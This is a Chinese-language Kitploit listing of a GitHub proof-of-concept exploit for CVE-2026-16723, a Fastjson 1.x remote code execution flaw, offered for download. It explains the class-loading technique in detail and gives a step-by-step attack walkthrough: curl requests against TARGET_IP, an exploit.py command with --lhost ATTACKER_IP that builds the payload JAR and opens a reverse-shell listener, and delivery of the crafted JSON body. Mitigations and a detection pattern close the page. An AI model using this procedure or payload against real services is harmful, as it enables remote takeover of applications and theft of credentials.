Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-16723 — CVE-2026-16723 的概念验证漏洞利用,这是一个 Fastjson 1.x @JSONType 远程代码执行漏洞,包含 payload JAR 构建器和反向 shell 监听器。 | Kitploit
工具/GitHubGitHub/yym8538/cve-2026-16723
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队远程访问工具
GitHubyym8538/cve-2026-16723

CVE-2026-16723

CVE-2026-16723 的概念验证漏洞利用,这是一个 Fastjson 1.x @JSONType 远程代码执行漏洞,包含 payload JAR 构建器和反向 shell 监听器。

查看仓库
11个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-16723 Fastjson RCE

★ CVE-2026-16723 Fastjson @JSONType RCE PoC ★


概述

CVE-2026-16723 是 Fastjson 1.x(1.2.68 – 1.2.83)中的一个**远程代码执行(RCE)**漏洞。 当 Fastjson 解析攻击者可控的 JSON 时,一个精心构造的 @type 值会在 checkAutoType 中被转换为类资源查找。在 Spring Boot 可执行 fat-JAR 中,类加载器将该名称解析为 jar:http:// URL 并获取远程 JAR(SSRF),随后加载一个带有 @JSONType 注解的类,即使 AutoType 已禁用。 由于现代 JDK / Tomcat 会拒绝 jar:http:// 二进制名称,可靠的变体将 JAR 植入 JVM 缓存,并通过 jar:file:/proc/self/fd/N 重新读取它,从而使该类被定义且其静态初始化器被执行,实现代码执行。 AutoType 保持禁用状态,且不需要任何 classpath gadget。


受影响版本

类别版本
受影响Fastjson 1.2.68 ≤ version ≤ 1.2.83
已修复迁移至 Fastjson 2.x(1.x 无修复版本)

影响

  • 以服务账户身份执行远程代码
  • 泄露主机和环境中的密钥 / 凭据
  • 完全攻陷受影响的应用程序

环境

实验目标是公开的商店前端(Northwind Store),其搜索 API 使用 Fastjson 绑定请求体。一切均为 Fastjson 的默认配置: SafeMode 关闭、AutoType 关闭,打包为 Spring Boot fat-JAR。

docker build -t cve-2026-16723 .
docker run -d --name cve-2026-16723 -p 8080:8080 cve-2026-16723
前置条件本实验中的状态
Fastjson 1.2.68 – 1.2.831.2.83
Spring Boot 可执行 fat-JAR是
未认证的 JSON 解析路径POST /api/products/search
SafeMode / AutoType默认(均关闭)

PoC

攻击者和目标运行在同一 Docker 桥接网络上,因此目标通过出站连接访问攻击者(无需发布额外端口)。

步骤 1. 确认目标已启动

curl http://TARGET_IP:8080/api/health
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' -d '{"keyword":"keyboard"}'

步骤 2. 在攻击者机器上运行漏洞利用程序

exploit.py 构建 payload JAR、提供该 JAR、启动监听器并打印 请求体。只需提供回调地址。

python3 attacker/exploit.py --lhost ATTACKER_IP --lport 4444

步骤 3. 投递 payload

将打印出的请求体粘贴到搜索端点(Burp Repeater 或 curl)并 发送。搜索请求是正常功能;只有其 JSON 体是精心构造的。

curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' --data-binary @body.json

步骤 4. 确认结果

代码以服务账户身份运行。通过获取的 shell 读取 flag:

whoami

缓解措施

  • 迁移至 Fastjson 2.x
  • 或运行 com.alibaba:fastjson:1.2.83_noneautotype
  • 或使用 -Dfastjson.parser.safeMode=true 启动 JVM
  • 检测:包含 jar:http 或 jar:file / /proc/self/fd 模式的 JSON @type 值

分析

  • KR:
  • EN:
下载工具